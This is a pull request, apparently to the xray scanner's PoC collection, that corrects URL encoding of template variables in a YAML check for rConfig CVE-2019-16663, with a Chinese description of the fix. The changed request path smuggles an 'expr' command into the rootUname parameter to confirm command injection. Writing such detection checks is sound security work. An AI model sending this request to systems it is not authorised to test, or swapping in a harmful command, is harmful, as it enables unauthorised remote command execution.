### PR TITLE
rconfig-cve-2019-16663的expr的编码错误{{}}不需要url编码转义

### DIFF
--- a/pocs/rconfig-cve-2019-16663.yml
+++ b/pocs/rconfig-cve-2019-16663.yml
@@ -4,7 +4,7 @@ set:
   r1: randomInt(800000000, 1000000000)
 rules:
   - method: GET
-    path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20%7B%7Br%7D%7D%20%2B%20%7B%7Br1%7D%7D%20%20%23
+    path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2b%20{{r1}}%20%23
     expression: |
       response.status == 200 && response.body.bcontains(bytes(string(r+r1)))
 detail:


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的

rconfig-cve-2019-16663的expr的编码错误{{}}不需要url编码转义

## 测试环境

https://www.cnblogs.com/17bdw/p/11840588.html
https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071

## 备注

r1和r应该是xray自带变量，花括号转码后没有办法测试成功了。
